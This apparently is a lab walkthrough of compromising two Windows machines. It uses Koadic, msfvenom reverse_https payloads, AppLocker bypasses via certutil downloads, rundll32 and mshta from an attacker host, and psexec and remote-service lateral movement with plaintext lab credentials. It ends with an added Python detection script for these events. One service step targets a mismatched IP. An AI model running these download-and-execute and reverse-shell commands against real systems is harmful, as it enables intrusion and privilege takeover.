OpenVPN connection
https://openvpn.net/community-downloads/
https://swupdate.openvpn.org/community/releases/OpenVPN-2.5.5-I602-amd64.msi
Be sure to download version 2.5.5 (the older release); the latest version does not support the lab's protocol.
Using the latest OpenVPN produces the error: TAP Mode Is Not Supported
10.100.10.240
Koadic one-liner to get a session
cmdshell 0
whoami
net user
net user victim
The user belongs to the Administrators group.
tasklist /svc
Check for security software with avlist: smartscreen.exe corresponds to Windows Defender.
Try running PowerShell.
Constrained Language Mode is in effect, so the PowerShell stager cannot run. The error is shown below; the key phrase is "in this language mode".
#< CLIXML
Cannot set property. Property setting is supported only on core types in this language mode.
At line:1 char:1
+ [Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 + CategoryInfo : InvalidOperation: (:) [], RuntimeException
 + FullyQualifiedErrorId : PropertySetterNotSupportedInConstrainedLanguage

Preparing modules for first use.
new-object : Cannot create type. Only core types are supported in this language mode.
At line:1 char:84
+ ... et.SecurityProtocolType]::Tls12;$aB2=new-object net.webclient;if([Sys ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~
 + CategoryInfo : PermissionDenied: (:) [New-Object], PSNotSupportedException
 + FullyQualifiedErrorId : CannotCreateTypeConstrainedLanguage,Microsoft.PowerShell.Commands.NewObjectCommand

Cannot invoke method. Method invocation is supported only on core types in this language mode.
At line:1 char:112
+ ... ebclient;if([System.Net.WebProxy]::GetDefaultProxy().address -ne $nul ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 + CategoryInfo : InvalidOperation: (:) [], RuntimeException
 + FullyQualifiedErrorId : MethodInvocationNotSupportedInConstrainedLanguage

new-object : Cannot create type. Only core types are supported in this language mode.
At line:1 char:294
+ ... alCache]::DefaultCredentials;};IEX ((new-object Net.WebClient).Downlo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~
 + CategoryInfo : PermissionDenied: (:) [New-Object], PSNotSupportedException
 + FullyQualifiedErrorId : CannotCreateTypeConstrainedLanguage,Microsoft.PowerShell.Commands.NewObjectCommand

new-object : Cannot create type. Only core types are supported in this language mode.
At line:1 char:390
+ ... 10:8082/0hVgS0/0kvEguaIZmQ0'));IEX ((new-object Net.WebClient).Downlo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~
 + CategoryInfo : PermissionDenied: (:) [New-Object], PSNotSupportedException
 + FullyQualifiedErrorId : CannotCreateTypeConstrainedLanguage,Microsoft.PowerShell.Commands.NewObjectCommand
Building an AV-evading exe
handler -H 175.12.80.10 -P 2334 -p windows/x64/meterpreter/reverse_https
Reference: https://whale3070.github.io/2021/07/09/%E9%BB%91%E5%AE%A2%E5%AD%A6%E5%BE%92%E6%97%A5%E8%AE%B0-%E5%82%80%E5%84%A1%E8%BF%9B%E7%A8%8B%E8%BF%87winDefender/
msfvenom -p windows/x64/meterpreter/reverse_https lhost=175.12.80.10 lport=2334 -f c
Use Koadic's file upload module to upload it to C:\users\temp.
start C:\users\temp\knefsb.exe
This program is blocked by group policy. For more information, contact your system administrator.
Bypassing application whitelisting
certutil.exe -urlcache -split -f http://175.12.80.10:80/knefsb.exe & knefsb.exe
Now get an MSF session for privilege escalation, bypassing AppLocker.
certutil.exe -urlcache -split -f http://175.12.80.10:80/knefsb.exe PowerShdll.dll
rundll32 .\PowerShdll.dll,main -i
handler -H 175.12.80.10 -P 4433 -p windows/meterpreter/reverse_https
msfvenom -p windows/meterpreter/reverse_https -a x86 -f csharp --platform windows -o out.txt -b "\x00\xff" LHOST=175.12.80.10 LPORT=4433 PrependMigrate=true PrependMigrateProc=svchost.exe
Following this article, build the JS file:
https://wtfsec.org/posts/%e5%85%8d%e6%9d%80-msf-windows-payload-%e7%9a%84%e6%96%b9%e6%b3%95%e4%b8%8e%e5%ae%9e%e8%b7%b5/
Once built, host it on port 80 at http://175.12.80.10/1.js
On the target, run: mshta http://175.12.80.10/1.js
Lateral movement over SMB
python3 psexec.py victim:Summer2020\!@10.100.10.240
The likely cause is that the uploaded exe was blocked from running by Group Policy, so no reverse shell came back.
smbmap
Do reconnaissance and confirm that this machine's disk is readable and writable.
net use \\10.100.10.240\admin$ /user:"ELS-CHILD\victim" "Summer2020!"
sc \\10.100.10.240 create whaleReverse binpath= "C:\windows\system32\cmd.exe /c mshta http://175.12.80.10:9999/27M8t"
sc \\192.168.123.45 start whaleReverse
Although the screenshot above reports StartService failed, the reverse shell did come back, and with SYSTEM privileges.
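From the defender's side, the whitelist-bypass steps above (certutil as a downloader, rundll32 loading PowerShdll.dll, mshta fetching a remote script) and the remote service created with a cmd /c mshta binPath all leave process-creation (Security 4688) and service-install (System 7045) events. The following Python is an added example, not part of the original writeup, that runs simple regex rules over constructed sample events of those two kinds; the event shape, rule names and sample values are assumptions.

```python
import re

# Constructed sample events (assumed shape; not real log data from the lab):
# 4688 = Security "process created" with its command line, 7045 = System "service installed" with binPath.
SAMPLE_EVENTS = [
    {"id": 4688, "user": "ELS-CHILD\\victim",
     "cmdline": "certutil.exe -urlcache -split -f http://175.12.80.10:80/knefsb.exe PowerShdll.dll"},
    {"id": 4688, "user": "ELS-CHILD\\victim", "cmdline": "rundll32 .\\PowerShdll.dll,main -i"},
    {"id": 4688, "user": "ELS-CHILD\\victim", "cmdline": "mshta http://175.12.80.10/1.js"},
    {"id": 7045, "service": "whaleReverse",
     "binpath": "C:\\windows\\system32\\cmd.exe /c mshta http://175.12.80.10:9999/27M8t"},
    # benign controls: a legitimate certutil use and a normal service image path
    {"id": 4688, "user": "ELS-CHILD\\victim", "cmdline": "certutil.exe -hashfile C:\\users\\temp\\report.pdf SHA256"},
    {"id": 7045, "service": "Spooler", "binpath": "C:\\Windows\\System32\\spoolsv.exe"},
]

# (rule name, regex, event ids the rule applies to). Rule names are our own labels;
# each regex targets one pattern seen in the walkthrough.
RULES = [
    # certutil fetching from a URL instead of doing certificate work
    ("certutil_download", re.compile(r"certutil(\.exe)?\s.*-urlcache", re.I), {4688}),
    # rundll32 calling an export of a DLL that does not live under system32
    ("rundll32_nonsystem_dll", re.compile(r"rundll32(\.exe)?\s+(?!\S*system32\\)\S+\.dll,", re.I), {4688}),
    # mshta pulling its script over HTTP(S), whether as a process or inside a service binPath
    ("mshta_remote_url", re.compile(r"mshta(\.exe)?\s+https?://", re.I), {4688, 7045}),
    # a cmd.exe one-liner where a service image path is expected
    ("service_cmd_oneliner", re.compile(r"cmd(\.exe)?\s+/c\s", re.I), {7045}),
]


def triage(events):
    """Return (event id, principal, [matched rule names]) for every event that hits a rule.
    For 4688 the principal is the user; for 7045 it is the service name."""
    hits = []
    for ev in events:
        text = ev.get("cmdline") or ev.get("binpath") or ""
        matched = [name for name, rx, scope in RULES if ev["id"] in scope and rx.search(text)]
        if matched:
            hits.append((ev["id"], ev.get("user") or ev.get("service"), matched))
    return hits


if __name__ == "__main__":
    for event_id, principal, names in triage(SAMPLE_EVENTS):
        print(f"event {event_id} {principal}: {', '.join(names)}")
```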
10.100.10.250
cd /home/kali/Documents/pentest/tool/zerologon/1472/impacket/examples/
python3 psexec.py Administrator:Summer2020!@10.100.10.250
mshta http://175.12.80.10:9999/27M8t
We now have SYSTEM privileges on two machines.
References